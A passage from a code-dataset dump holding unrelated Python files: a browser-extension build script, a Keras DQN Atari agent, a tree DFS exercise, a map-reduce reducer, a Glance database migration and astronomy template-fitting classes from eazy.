calculate size of interval\ncombinations['size'] = combinations['right'] - combinations['left']\n## return intervals less than 300\nintervals = combinations.loc[combinations['size'] <= 300].reset_index(drop=True)\n\nleftSide['side'] = 'l'\nrightSide['side'] = 'r'\nl = leftSide.rename(columns = {'left' : 'pos', 'lPAM' : 'PAM'})\nr = rightSide.rename(columns = {'right' : 'pos', 'rPAM' : 'PAM'})\n\nl.append(r)\n","sub_path":"sketchPad.py","file_name":"sketchPad.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582335843","text":"#!/usr/bin/python3\n\nimport argparse\nimport os\nimport sys\nimport subprocess\nimport shutil\nimport time\nimport zipfile\nimport re\n\nprojects = [\n \"download_management\",\n \"proxy_select\",\n \"read_free\",\n \"tabs_overview\",\n \"windows_overview\"\n]\n\nexclusions = [\n \"v8-compile-cache\",\n \"temp\",\n \"out\",\n \"vscode\",\n \".git\",\n \"node_modules\",\n \"/dist\",\n]\n\n\ndef colourprint(string):\n print(\"{0}{2}{1}\".format('\\033[94m', 
'\\x1b[0m', string))\n\n\ndef timer():\n start = time.time()\n\n def end():\n for _ in range(0, 5):\n print()\n colourprint(f\"RUNTIME: {round(time.time() - start, 2)} SECONDS\")\n return end\n\n\ndef parse():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"select\", type=int, choices=range(-1, len(projects)))\n parser.add_argument(\"-o\", \"--out\", default=\"./out\")\n parser.add_argument(\"-b\", \"--build\", action=\"store_true\")\n parser.add_argument(\"-w\", \"--watch\", action=\"store_true\")\n parser.add_argument(\"-l\", \"--lint\", action=\"store_true\")\n parser.add_argument(\"-z\", \"--zip\", action=\"store_true\")\n parser.add_argument(\"-a\", \"--all\", action=\"store_true\")\n return parser.parse_args()\n\n\ndef zip_dir(base, name, out, exclusions):\n zf = zipfile.ZipFile(f\"{out}/{name}.zip\", \"w\")\n for dirname, subdirs, files in os.walk(base):\n if any([re.compile(exclude).search(dirname) for exclude in exclusions]):\n continue\n zf.write(dirname)\n for filename in files:\n zf.write(os.path.join(dirname, filename))\n zf.close()\n\n\nt = timer()\nargs = parse()\n\n\nif not args.select == -1:\n projects = [projects[args.select]]\n\nif args.all:\n args.build = args.lint = args.zip = True\n\nif not os.path.exists(args.out):\n os.makedirs(args.out)\n\nfor project in projects:\n\n print()\n colourprint(f\"BEGIN -- {project} -- BEGIN\")\n print()\n\n dist = f\"./{project}/dist\"\n if os.path.exists(dist):\n shutil.rmtree(dist)\n os.makedirs(dist)\n\n build = f\"npm run webpack -- --config ./{project}/webpack.config.ts\".split()\n lint = f\"npm run web-ext -- -s ./{project}/dist/ lint\".split()\n package = f\"npm run web-ext -- -o -s {dist} -a {args.out} build\".split()\n watch = f\"{' '.join(build)} --watch\".split()\n pretty = f\"npm run prettier\".split()\n\n if args.build:\n subprocess.call(pretty)\n subprocess.call(build)\n if args.watch:\n subprocess.call(watch)\n if args.lint:\n subprocess.call(lint)\n if args.zip:\n subprocess.call(package)\n zip_dir(\".\", f\"{project}_source\", args.out, exclusions)\n\n print()\n colourprint(f\"END -- {project} -- END\")\n print()\n\nt()\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"496374053","text":"from agent_dir.agent import Agent\n\nfrom collections import deque\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import RMSprop\nfrom keras.layers import Dense, Flatten, Input, Add, RepeatVector, Reshape\nfrom keras.layers.convolutional import Conv2D\nfrom keras import backend as K\nimport os,random,sys\nimport tensorflow as tf\nimport numpy as np\nclass Agent_DQN(Agent):\n def __init__(self, env, args):\n \"\"\"\n Initialize every things you need here.\n For example: building your model\n \"\"\"\n\n super(Agent_DQN,self).__init__(env)\n print(args) \n self.env = env\n self.args = args\n self.state_size = (84, 84, 4)\n self.action_size = env.action_space.n - 1 #ignore nop action\n\n if args.test_dqn:\n #you can load your model here\n print('loading trained model')\n if args.dqn_dueling and os.path.isfile(args.dqn_model):\n print('load duel network model from %s.' % args.dqn_model)\n self.model = self.build_dueling_model()\n self.model.load_weights(args.dqn_model)\n elif os.path.isfile(args.dqn_model):\n print('load model from %s.' 
% args.dqn_model)\n self.model = self.build_model()\n self.model.load_weights(args.dqn_model)\n\n\n \n\n def init_game_setting(self):\n \"\"\"\n\n Testing function will call this function at the begining of new game\n Put anything you want to initialize if necessary\n\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n pass\n\n\n def train(self):\n \"\"\"\n Implement your training algorithm here\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n args = self.args\n #self.epsilon = 1.\n self.epsilon = args.dqn_epsilon\n self.epsilon_end = args.dqn_epsilon_end\n self.exploration_steps = args.dqn_exploration_steps\n self.epsilon_decay_step = (self.epsilon - self.epsilon_end) \\\n / self.exploration_steps\n # parameters about training\n self.batch_size = args.dqn_batch\n #self.train_start = 50000\n self.train_start = args.dqn_train_start\n #self.train_start = 3000\n self.update_target_rate = args.dqn_update_target \n self.discount_factor = args.dqn_discount_factor\n #self.memory = deque(maxlen=400000)\n self.memory = deque(maxlen=args.dqn_memory)\n self.no_op_steps = args.dqn_no_ops\n # build model\n if args.dqn_dueling:\n self.model = self.build_dueling_model()\n self.model.name = 'dueling_network' \n self.target_model = self.build_dueling_model()\n self.target_model.name = 'dueling_target_network'\n else:\n self.model = self.build_model()\n self.model.name = 'evaluate_network'\n self.target_model = self.build_model()\n self.target_model.name ='target_network'\n self.update_target_model()\n\n\n self.optimizer = self.optimizer()\n self.sess = tf.InteractiveSession()\n K.set_session(self.sess)\n\n self.avg_q_max, self.avg_loss = 0, 0\n\n self.summary_placeholders, self.update_ops, self.summary_op = \\\n self.setup_summary()\n self.summary_writer = tf.summary.FileWriter(\n args.dqn_summary , self.sess.graph)\n self.sess.run(tf.global_variables_initializer())\n \n if self.args.keep_train:\n if args.dqn_dueling: \n if os.path.isfile(args.dqn_model):\n print('load duel network model from %s.' % args.dqn_model)\n self.model.load_weights(args.dqn_model)\n elif os.path.isfile(self.args.dqn_model):\n print('load model from %s.' 
% args.dqn_model)\n self.model.load_weights(args.dqn_model)\n else:\n print('train a new model.')\n print('Training Mode : double DQN:[%s] duel network:[%s]' % (args.dqn_double_dqn, args.dqn_dueling) )\n \n #training iteration\n scores, episodes, global_step = [], [], 0\n env = self.env\n STATE_WIDTH, STATE_HEIGHT, STATE_LENGTH = (84, 84, 4)\n e = 0\n step, score = 0, 0\n t = 0.\n while e <= args.dqn_max_spisode:\n done = False\n dead = False\n # 1 episode = 5 lives\n observe = env.reset()\n\n # this is one of DeepMind's idea.\n # just do nothing at the start of episode to avoid sub-optimal\n for _ in range(random.randint(1, self.no_op_steps)):\n observe, _, _, _ = env.step(env.get_random_action())\n\n # At start of episode, there is no preceding frame\n # So just copy initial states to make history\n state = np.reshape(observe, (1, STATE_WIDTH, STATE_HEIGHT, STATE_LENGTH))\n history = state\n\n while not dead:\n global_step += 1\n step += 1\n\n # get action for the current history and go one step in environment\n action = self.get_action(history)\n # change action to real_action\n if action == 0:\n real_action = 1\n elif action == 1:\n real_action = 2\n else:\n real_action = 3\n\n observe, reward, dead, info = env.step(real_action)\n # pre-process the observation --> history\n next_state = np.reshape(observe, (1, STATE_WIDTH, STATE_HEIGHT, STATE_LENGTH))\n next_history = next_state \n\n self.avg_q_max += np.amax(\n self.model.predict(np.float32(history))[0])\n\n # if the agent missed ball, agent is dead --> episode is not over\n if info['ale.lives'] == 0:\n done = True\n\n #reward = np.clip(reward, -1., 1.)\n\n # save the sample to the replay memory\n self.replay_memory(history, action, reward, next_history, dead)\n # every some time interval, train model\n self.train_replay()\n # update the target model with model\n if global_step % self.update_target_rate == 0:\n self.update_target_model()\n\n score += reward\n #print('dead done reward score',dead,done,reward,score)\n # if agent is dead, then reset the history\n if not dead:\n history = next_history\n '''\n else:\n print('dead',info['ale.lives'])\n if global_step %100 == 0:\n from time import time\n print('%.1f' % (time()-t))\n t = time()\n '''\n # if done, plot the score over episodes\n if done:\n mode = 'train' if global_step > self.train_start else 'random'\n if global_step > self.train_start:\n stats = [score, self.avg_q_max / float(step), step,\n self.avg_loss / float(step)]\n for i in range(len(stats)):\n self.sess.run(self.update_ops[i], feed_dict={\n self.summary_placeholders[i]: float(stats[i])\n })\n summary_str = self.sess.run(self.summary_op)\n self.summary_writer.add_summary(summary_str, e + 1)\n if e % 10 == 0: \n print(\"episode:\", e, \" score:\", score, \" memory length:\",\n len(self.memory), \" epsilon:\", self.epsilon,\n \" global_step:\", global_step, \" average_q:\",\n self.avg_q_max / float(step), \" average loss:\",\n self.avg_loss / float(step), \" mode:\",mode\n )\n sys.stdout.flush()\n\n self.avg_q_max, self.avg_loss = 0, 0\n if e % args.dqn_save_interval == 0 and e >= args.dqn_save_interval:\n if self.args.dqn_dueling:\n print('save duel network model to %s.' 
% args.dqn_model)\n self.model.save_weights(args.dqn_model)\n else:\n print('save model to %s with double dqn : %s' % (args.dqn_model, self.args.dqn_double_dqn) )\n self.model.save_weights(args.dqn_model)\n e += 1\n score = 0\n\n\n def make_action(self, observation, test=True):\n \"\"\"\n Return predicted action of your agent\n\n Input:\n observation: np.array\n stack 4 last preprocessed frames, shape: (84, 84, 4)\n\n Return:\n action: int\n the predicted action from trained model\n \"\"\"\n ##################\n # YOUR CODE HERE #\n ##################\n state = np.reshape(observation, (1, 84, 84, 4))\n q_value = self.model.predict(state)\n action = np.argmax(q_value[0])\n if action == 0:\n real_action = 1\n elif action == 1:\n real_action = 2\n else:\n real_action = 3\n return real_action\n def optimizer(self):\n a = K.placeholder(shape=(None,), dtype='int32')\n y = K.placeholder(shape=(None,), dtype='float32')\n\n py_x = self.model.output\n\n a_one_hot = K.one_hot(a, self.action_size)\n q_value = K.sum(py_x * a_one_hot, axis=1)\n error = K.square(y - q_value)\n \"\"\"\n error = K.abs(y - q_value)\n quadratic_part = K.clip(error, 0.0, 1.0)\n linear_part = error - quadratic_part\n loss = K.mean(0.5 * K.square(quadratic_part) + linear_part)\n \"\"\"\n error = K.clip(error, 0.0, 3.0)\n loss = K.mean(error)\n optimizer = RMSprop(lr=0.00025, epsilon=0.01)\n updates = optimizer.get_updates(self.model.trainable_weights, [], loss)\n\n train = K.function([self.model.input, a, y], [loss], updates=updates)\n return train \n\n # approximate Q function using Convolution Neural Network\n # state is input and Q Value of each action is output of network\n def build_model(self):\n model = Sequential()\n model.add(Conv2D(32, (8, 8), strides=(4, 4), activation='relu',\n input_shape=self.state_size))\n model.add(Conv2D(64, (4, 4), strides=(2, 2), activation='relu'))\n model.add(Conv2D(64, (3, 3), strides=(1, 1), activation='relu'))\n model.add(Flatten())\n model.add(Dense(512, activation='relu'))\n model.add(Dense(self.action_size))\n #model.summary()\n return model\n def build_dueling_model(self):\n state = Input(shape=(self.state_size))\n\n buf = Conv2D(32, (8, 8), strides=(4, 4), activation='relu')(state)\n buf = Conv2D(64, (4, 4), strides=(2, 2), activation='relu')(buf)\n buf = Conv2D(64, (3, 3), strides=(1, 1), activation='relu')(buf)\n buf = Flatten()(buf)\n #action\n a = Dense(512, activation='relu')(buf)\n a = Dense(self.action_size)(a)\n #value\n v = Dense(512, activation='relu')(buf)\n v = Dense(1)(v)\n v = RepeatVector(self.action_size)(v)\n v = Reshape([self.action_size])(v)\n #sum\n q = Add()([v,a])\n model = Model(inputs=state, outputs=q)\n model.summary()\n return model\n\n # after some time interval update the target model to be same with model\n def update_target_model(self):\n self.target_model.set_weights(self.model.get_weights())\n # get action from model using epsilon-greedy policy\n def get_action(self, history):\n history = np.float32(history)\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.action_size)\n else:\n q_value = self.model.predict(history)\n return np.argmax(q_value[0])\n\n def replay_memory(self, history, action, reward, next_history, dead):\n self.memory.append((history, action, reward, next_history, dead))\n # pick samples randomly from replay memory (with batch_size)\n def train_replay(self):\n if len(self.memory) < self.train_start:\n return\n if self.epsilon > self.epsilon_end:\n self.epsilon -= self.epsilon_decay_step\n\n mini_batch = 
random.sample(self.memory, self.batch_size)\n\n        history = np.zeros((self.batch_size, self.state_size[0],\n                            self.state_size[1], self.state_size[2]))\n        next_history = np.zeros((self.batch_size, self.state_size[0],\n                                 self.state_size[1], self.state_size[2]))\n        target = np.zeros((self.batch_size,))\n        action, reward, dead = [], [], []\n\n        for i in range(self.batch_size):\n            history[i] = np.float32(mini_batch[i][0])\n            next_history[i] = np.float32(mini_batch[i][3])\n            action.append(mini_batch[i][1])\n            reward.append(mini_batch[i][2])\n            dead.append(mini_batch[i][4])\n\n        target_value = self.target_model.predict(next_history)\n        if self.args.dqn_double_dqn:\n            eval_act = np.argmax(self.model.predict(next_history), axis = -1)\n            #assert eval_act.shape == (self.batch_size,)\n\n        # like Q Learning, get maximum Q value at s'\n        # But from target model\n        for i in range(self.batch_size):\n            if dead[i]:\n                target[i] = reward[i]\n            else:\n                if self.args.dqn_double_dqn:\n                    target[i] = reward[i] + self.discount_factor * \\\n                                target_value[i,eval_act[i]]\n                else:\n                    target[i] = reward[i] + self.discount_factor * \\\n                                np.amax(target_value[i])\n        loss = self.optimizer([history, action, target])\n        self.avg_loss += loss[0]\n\n\n    # make summary operators for tensorboard\n    def setup_summary(self):\n        episode_total_reward = tf.Variable(0.)\n        episode_avg_max_q = tf.Variable(0.)\n        episode_duration = tf.Variable(0.)\n        episode_avg_loss = tf.Variable(0.)\n\n        tf.summary.scalar('Total Reward/Episode', episode_total_reward)\n        tf.summary.scalar('Average Max Q/Episode', episode_avg_max_q)\n        tf.summary.scalar('Duration/Episode', episode_duration)\n        tf.summary.scalar('Average Loss/Episode', episode_avg_loss)\n\n        summary_vars = [episode_total_reward, episode_avg_max_q,\n                        episode_duration, episode_avg_loss]\n        summary_placeholders = [tf.placeholder(tf.float32) for _ in\n                                range(len(summary_vars))]\n        update_ops = [summary_vars[i].assign(summary_placeholders[i]) for i in\n                      range(len(summary_vars))]\n        summary_op = tf.summary.merge_all()\n        return summary_placeholders, update_ops, summary_op\n\n","sub_path":"project/spatial_transformer_networks-master/src/agent_dqn.py","file_name":"agent_dqn.py","file_ext":"py","file_size_in_byte":15317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424319333","text":"def dfs(ar, index=0):\n    global s\n    for child in ar[index]:\n        # children are stored as plain ints (see adj_list below), so append\n        # the number itself and recurse into that node\n        s = s + str(child)\n        dfs(ar, child - 1)\n\n\nn, c = map(int, input().split())\nadj_list = [[] for _ in range(n)]\ncolors = {}\n_ar = list(map(int, input().split()))\ni = 1\nwhile i < len(_ar):\n    if _ar[i - 1] != _ar[i]:\n        adj_list[_ar[i] - 1].append(_ar[i])\n    i += 1\nprint(adj_list)\n\n\n# assumption: str_to_check was never defined in the original script, so the\n# query string is read from input like the other values\nstr_to_check = input()\n\ns = ''\ndfs(adj_list)\n# print(s)\nflag = False\nif str_to_check in s:\n    print(\"YES\")\n    flag = True\nelif str_to_check in s[::-1]:\n    s = s[::-1]\n    print(\"YES\")\n    flag = True\nelse:\n    print(\"NO\")\n\nif flag:\n    res = s.index(str_to_check)\n    print(res + 1, res + len(str_to_check))\n","sub_path":"Trees/Манкуніанець і квіткове дерево/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"502629585","text":"#!/usr/bin/env python3\nfrom operator import itemgetter\nimport sys\n\nvsPerk = dict()\n\nfor line in sys.stdin:\n\tword, count = line.split('\\t')\n\ttry:\n\t\tcount = int(count)\n\texcept ValueError:\n\t\tcontinue\n\ttry:\n\t\tvsPerk[word].append(count)\n\texcept KeyError:\n\t\tvsPerk[word]=[count]\n\nfor key,items in 
vsPerk.items():\n\tprint(key,sum(items))\n\nsys.stdout.flush()\n","sub_path":"Task1/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"442808848","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom sqlalchemy import Column, Enum, Index, MetaData, Table, select, not_, and_\nfrom sqlalchemy.engine import reflection\n\n\ndef upgrade(migrate_engine):\n meta = MetaData(bind=migrate_engine)\n\n images = Table('images', meta, autoload=True)\n\n enum = Enum('private', 'public', 'shared', 'community', metadata=meta,\n name='image_visibility')\n enum.create()\n\n images.create_column(Column('visibility', enum, nullable=False,\n server_default='shared'))\n visibility_index = Index('visibility_image_idx', images.c.visibility)\n visibility_index.create(migrate_engine)\n\n images.update(values={'visibility': 'public'}).where(\n images.c.is_public).execute()\n\n image_members = Table('image_members', meta, autoload=True)\n\n # NOTE(dharinic): Mark all the non-public images as 'private' first\n images.update().values(visibility='private').where(\n not_(images.c.is_public)).execute()\n # NOTE(dharinic): Identify 'shared' images from the above\n images.update().values(visibility='shared').where(and_(\n images.c.visibility == 'private', images.c.id.in_(select(\n [image_members.c.image_id]).distinct().where(\n not_(image_members.c.deleted))))).execute()\n\n insp = reflection.Inspector.from_engine(migrate_engine)\n for index in insp.get_indexes('images'):\n if 'ix_images_is_public' == index['name']:\n Index('ix_images_is_public', images.c.is_public).drop()\n break\n\n images.c.is_public.drop()\n","sub_path":"glance/db/sqlalchemy/migrate_repo/versions/045_add_visibility.py","file_name":"045_add_visibility.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"22246145","text":"import os\nimport numpy as np\n\nimport astropy.units as u\n\nfrom . 
import utils\n\n#import unicorn\n\n__all__ = [\"TemplateError\", \"Template\"]\n\nclass TemplateError():\n \"\"\"\n Make an easy (spline) interpolator for the template error function\n \"\"\"\n def __init__(self, file='templates/TEMPLATE_ERROR.eazy_v1.0', arrays=None, lc=[5500.], scale=1.):\n self.file = file\n if arrays is None:\n self.te_x, self.te_y = np.loadtxt(file, unpack=True)\n else:\n self.te_x, self.te_y = arrays\n \n self.scale = scale\n self.lc = lc\n self._set_limits()\n self._init_spline()\n \n def _set_limits(self):\n \"\"\"\n Limits to control extrapolation\n \"\"\"\n nonzero = self.te_y > 0\n self.min_wavelength = self.te_x[nonzero].min()\n self.max_wavelength = self.te_x[nonzero].max()\n \n def _init_spline(self):\n from scipy import interpolate\n self._spline = interpolate.CubicSpline(self.te_x, self.te_y)\n \n def interpolate(self, filter_wavelength=5500., z=1.):\n \"\"\"\n observed_wavelength is observed wavelength of photometric filters. But \n these sample the *rest* wavelength of the template error function at lam/(1+z)\n \"\"\"\n return self._spline(filter_wavelength/(1+z))*self.scale\n \n def __call__(self, z):\n lcz = np.array(self.lc)/(1+z)\n tef_z = self._spline(self.lc/(1+z))*self.scale \n clip = (lcz < self.min_wavelength) | (lcz > self.max_wavelength)\n tef_z[clip] = 0.\n \n return tef_z\n\nclass Redden():\n \"\"\"\n Wrapper function for `~dust_attenuation` and `~dust_extinction` \n reddening laws\n \"\"\"\n def __init__(self, model=None, Av=0., **kwargs):\n \"\"\"\n model: extinction/attenuation object or str\n \n Allowable string arguments:\n \n 'smc' = `~dust_extinction.averages.G03_SMCBar`\n 'lmc' = `~dust_extinction.averages.G03_LMCAvg`\n 'mw','f99' = `~dust_extinction.parameter_averages.F99`\n 'calzetti00', 'c00' = `~dust_attenuation.averages.C00`\n 'wg00' = '~dust_attenuation.radiative_transfer.WG00`\n \n Av: selective extinction/attenuation\n (passed as tau_V for `WG00`)\n \n \"\"\"\n allowed = ['smc', 'lmc', 'mw', 'f99', 'c00', 'calzetti00', 'wg00',\n 'kc13','reddy15','zafar15']\n \n if isinstance(model, str):\n self.model_name = model\n \n if model in ['smc']:\n from dust_extinction.averages import G03_SMCBar\n self.model = G03_SMCBar()\n elif model in ['lmc']:\n from dust_extinction.averages import G03_LMCAvg\n self.model = G03_LMCAvg()\n elif model in ['mw','f99']:\n from dust_extinction.parameter_averages import F99 \n self.model = F99()\n elif model in ['calzetti00', 'c00']:\n from dust_attenuation.averages import C00\n self.model = C00(Av=Av)\n elif model.lower() in ['kc13']:\n from eazy.sps import KC13\n self.model = KC13(Av=Av, **kwargs)\n elif model.lower() in ['reddy15']:\n from eazy.sps import Reddy15\n self.model = Reddy15(Av=Av, **kwargs)\n elif model.lower() in ['zafar15']:\n from eazy.sps import Zafar15\n self.model = Zafar15(Av=Av)\n elif model in ['wg00']:\n from dust_attenuation.radiative_transfer import WG00\n if 'tau_V' in kwargs:\n self.model = WG00(**kwargs)\n else:\n self.model = WG00(tau_V=Av, **kwargs) \n else:\n msg = \"Requested model ('{model}') not in {allowed}.\" \n raise IOError(msg.format(model=model, allowed=allowed))\n else:\n self.model = model\n self.model_name = 'Unknown'\n \n for k in ['Av', 'tau_V']:\n if hasattr(model, k):\n Av = getattr(model, k)\n break\n \n self.Av = Av\n \n @property \n def ebv(self):\n if hasattr(self.model, 'Rv'):\n return self.Av/self.model.Rv\n else:\n print('Warning: Rv not defined for model: ' + self.__repr__())\n return 0.\n \n def __repr__(self):\n return 
'<Redden {0}, Av={1}>'.format(self.model.__repr__(), self.Av)\n    \n    def __call__(self, wave, left=0, right=1., **kwargs):\n        \"\"\"\n        Return reddening factor. If input has no units, assume \n        `~astropy.units.Angstrom`.\n        \"\"\"\n        \n        if not hasattr(wave, 'unit'):\n            xu = wave*u.Angstrom\n        else:\n            if wave.unit is None:\n                # e.g. a table column with no unit attached\n                xu = wave.data*u.Angstrom\n            else:\n                xu = wave\n        \n        if 'Av' in kwargs:\n            self.Av = kwargs['Av']\n        \n        if 'tau_V' in kwargs:\n            self.Av = kwargs['tau_V']\n        \n        for k in kwargs:\n            if hasattr(self.model, k):\n                setattr(self.model, k, kwargs[k])\n        \n        ext = np.atleast_1d(np.ones_like(xu.value))\n        \n        if hasattr(self.model, 'x_range'):\n            if hasattr(self.model, 'extinguish'):\n                # dust_extinction has x_range in 1/micron\n                xblue = (1./xu.to(u.micron)).value > self.model.x_range[1]\n                xred = (1./xu.to(u.micron)).value < self.model.x_range[0]\n            else:\n                # dust_attenuation has x_range in micron\n                xblue = (xu.to(u.micron)).value < self.model.x_range[0]\n                xred = (xu.to(u.micron)).value > self.model.x_range[1]\n            \n            ext[xblue] = left\n            ext[xred] = right\n            xr = (~xblue) & (~xred)\n        else:\n            xr = np.isfinite(wave)\n        \n        if (self.model is None) | (self.Av <= 0):\n            # Don't do anything\n            pass\n        elif hasattr(self.model, 'extinguish'):\n            # extinction\n            ext[xr] = self.model.extinguish(xu[xr], Av=self.Av)\n        elif hasattr(self.model, 'attenuate'):\n            # attenuation\n            if hasattr(self.model, 'tau_V'):\n                # WG00\n                self.model.tau_V = self.Av\n            else:\n                self.model.Av = self.Av\n            \n            ext[xr] = self.model.attenuate(xu[xr])\n        else:\n            msg = ('Dust model must have either `attenuate` or `extinguish`'\n                   ' method.')\n            raise IOError(msg)\n        \n        if hasattr(wave, '__len__'):\n            return ext\n        elif ext.size == 1:\n            return ext[0]\n        else:\n            return ext\n    \nclass Template():\n    def __init__(self, sp=None, file=None, name=None, arrays=None, meta={}, to_angstrom=1., velocity_smooth=0, norm_filter=None, resample_wave=None, fits_column='flux', redfunc=Redden(), template_redshifts=[0], verbose=True):\n        \"\"\"\n        Template object.\n        \n        Attributes:\n        \n        wave = wavelength in `~astropy.units.Angstrom`\n        flux = flux density, f-lambda\n        name = str\n        meta = dict\n        redfunc = optional `Redden` object\n        \n        Properties: \n        \n        flux_fnu = flux density, f-nu\n        \n        Can optionally specify a 2-dimensional flux array with the first\n        dimension indicating the template for the nearest redshift in the \n        corresponding ``template_redshifts`` list. 
When integrating the \n filter fluxes with ``integrate_filter``, the template index with the \n redshift nearest to the specified redshift will be used.\n \n \"\"\"\n import copy\n from astropy.table import Table\n import astropy.units as u\n \n self.wave = None\n self.flux = None\n \n self.name = 'None'\n self.meta = copy.deepcopy(meta)\n \n self.velocity_smooth = velocity_smooth\n \n if name is None:\n if file is not None:\n self.name = os.path.basename(file)\n else:\n self.name = name\n \n self.orig_table = None\n \n if sp is not None:\n # Prospector \n self.wave = np.cast[np.float](sp.wave)\n self.flux = np.cast[np.float](sp.flux)\n # already fnu\n self.flux *= utils.CLIGHT*1.e10 / self.wave**2\n \n elif file is not None:\n # Read from a file\n if file.split('.')[-1] in ['fits','csv','ecsv']:\n tab = Table.read(file)\n self.wave = tab['wave'].data.astype(np.float)\n self.flux = tab[fits_column].data.astype(np.float)\n self.orig_table = tab\n \n # Transpose because FITS tables stored like NWAVE, NZ\n if self.flux.ndim == 2:\n self.flux = self.flux.T\n \n for k in tab.meta:\n self.meta[k] = tab.meta[k]\n \n else:\n _arr = np.loadtxt(file, unpack=True)\n self.wave, self.flux = _arr[0], _arr[1]\n \n elif arrays is not None:\n self.wave, self.flux = arrays[0]*1., arrays[1]*1.\n #self.set_fnu()\n else:\n raise TypeError('Must specify either `sp`, `file` or `arrays`')\n \n if self.flux.ndim == 1:\n # For redshift dependence\n self.flux = np.atleast_2d(self.flux)\n self.template_redshifts = np.zeros(1)\n self.NZ, self.NWAVE = self.flux.shape\n else:\n self.NZ, self.NWAVE = self.flux.shape\n if 'NZ' in self.meta:\n template_redshifts = [self.meta[f'Z{j}'] \n for j in range(self.meta['NZ'])]\n \n if len(template_redshifts) != self.NZ:\n msg = (f'template_redshifts ({len(template_redshifts)})'\n f' doesn\\'t match flux dimension ({self.NZ})!')\n raise ValueError(msg)\n \n self.template_redshifts = np.array(template_redshifts)\n \n # if verbose:\n # print(f'Redshift dependent! (NZ={self.NZ})')\n \n # Handle optional units\n if hasattr(self.wave, 'unit'):\n if self.wave.unit is not None:\n self.wave = self.wave.to(u.Angstrom).value\n else:\n self.wave = self.wave.data\n else:\n self.wave *= to_angstrom\n\n flam_unit = u.erg/u.second/u.cm**2/u.Angstrom\n \n if hasattr(self.flux, 'unit'):\n if self.flux.unit is not None:\n equiv = u.equivalencies.spectral_density(self.wave*u.Angstrom)\n flam = self.flux.to(flam_unit, equivalencies=equiv) \n self.flux = flam.value\n else:\n self.flux = self.flux.data\n \n # Smoothing \n if velocity_smooth > 0:\n self.smooth_velocity(velocity_smooth, in_place=True)\n \n # Resampling\n self.resample(resample_wave, in_place=True)\n \n #self.set_fnu()\n \n # Reddening function\n self.redfunc = redfunc\n _red = self.redden # test to break at init if fails\n \n def __repr__(self):\n if self.name is None:\n return self.__class__\n else:\n return '{0}: {1}'.format(self.__class__, self.name)\n \n #@property\n def absorbed_energy(self, i=0):\n diff = self.flux[i,:]*(1-self.redden)*(self.redden > 0)\n absorbed = np.trapz(diff, self.wave)\n return absorbed\n # if self.NZ == 1:\n # return absorbed[0]\n # else:\n # return absorbed\n \n @property\n def redden(self):\n \"\"\"\n Return multiplicative scaling from `self.redfunc`, which is expected\n to return attenuation in magnitudes.\n \"\"\"\n if self.redfunc is not None:\n red = self.redfunc(self.wave*u.Angstrom)\n else:\n red = 1.\n \n return red\n \n #@property \n def flux_fnu(self, i=0):\n \"\"\"\n self.flux is flam. 
Scale to fnu\n \"\"\"\n return self.flux[i,:] * self.wave**2 / (utils.CLIGHT*1.e10) * self.redden\n \n def set_fnu(self):\n \"\"\"\n Deprecated. `flux_fnu` is now a `@property`.\n \"\"\"\n pass\n #self.flux_fnu = self.flux * self.wave**2 / 3.e18\n \n def smooth_velocity(self, velocity_smooth, in_place=True, raise_error=False):\n \"\"\"\n Smooth template in velocity using `prospect`\n \"\"\"\n try:\n from prospect.utils.smoothing import smooth_vel\n except:\n if raise_error:\n raise ImportError(\"Couldn't import `prospect.utils.smoothing\")\n else:\n return None\n \n if velocity_smooth <= 0:\n if in_place:\n return True\n else:\n return self\n \n sm_flux = np.array([smooth_vel(self.wave, self.flux[i,:], self.wave, \n velocity_smooth) for i in range(self.NZ)])\n \n sm_flux[~np.isfinite(sm_flux)] = 0.\n \n if in_place:\n self.flux_orig = self.flux*1\n self.velocity_smooth = velocity_smooth\n self.flux = sm_flux\n return True\n else:\n return Template(arrays=(self.wave, sm_flux), \n name=self.name, meta=self.meta, \n template_redshifts=self.template_redshifts)\n \n def resample(self, new_wave, z=0, in_place=True, return_array=False, interp_func=utils.interp_conserve):\n \"\"\"\n Resample the template to a new wavelength grid\n \"\"\"\n import astropy.units as u\n \n breakme = False\n if isinstance(new_wave, str):\n if new_wave == 'None':\n breakme = True\n elif not os.path.exists(new_wave):\n msg = 'WARNING: new_wave={0} could not be found'\n print(msg.format(new_wave))\n breakme = True\n else:\n new_wave = np.loadtxt(new_wave)\n \n elif new_wave is None:\n breakme = True\n \n if breakme:\n if in_place:\n return False\n else:\n return self\n \n if hasattr(new_wave, 'unit'):\n new_wave = new_wave.to(u.Angstrom).value\n \n new_flux = [interp_func(new_wave, self.wave*(1+z), self.flux[i,:])\n for i in range(self.NZ)]\n new_flux = np.array(new_flux)\n \n if in_place:\n self.wave = new_wave*1\n self.flux = new_flux\n return True\n else:\n if return_array:\n return new_flux\n else:\n return Template(arrays=(new_wave, new_flux), \n name=self.name, meta=self.meta, \n template_redshifts=self.template_redshifts)\n \n def zindex(self, z=0., redshift_type='nearest'):\n \"\"\"\n Get the redshift index of a multi-dimensional template array\n \"\"\"\n #dz = z - self.template_redshifts\n \n 